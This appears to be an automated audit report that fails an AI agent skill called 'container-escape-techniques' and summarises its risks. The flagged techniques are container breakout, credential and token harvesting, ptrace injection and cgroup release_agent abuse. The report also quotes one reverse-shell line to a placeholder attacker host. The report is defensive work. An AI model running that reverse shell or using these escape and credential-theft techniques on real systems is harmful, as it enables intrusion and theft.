container-escape-techniques
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGH
Categories: COMMAND_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: Provides comprehensive instructions for escaping container isolation using nsenter, mount, and chroot to gain unauthorized access to the host's filesystem and process space.
- [DATA_EXFILTRATION]: Includes templates for setting up reverse shells via cron jobs (bash -i >& /dev/tcp/ATTACKER/4444) and instructions for reading sensitive host system files like /etc/shadow.
- [CREDENTIALS_UNSAFE]: Lists specific paths and commands for harvesting Kubernetes service account tokens, cluster certificates, and host SSH authorized_keys for credential theft and lateral movement.
- [REMOTE_CODE_EXECUTION]: Documents advanced techniques for host process injection using ptrace and leveraging the cgroup release_agent mechanism to execute arbitrary malicious scripts on the host.
- [EXTERNAL_DOWNLOADS]: Recommends the retrieval and execution of various external security tools (e.g., deepce.sh, CDK, amicontained) for automated discovery of escape vectors without integrity verification.
Recommendations
- AI detected serious security threats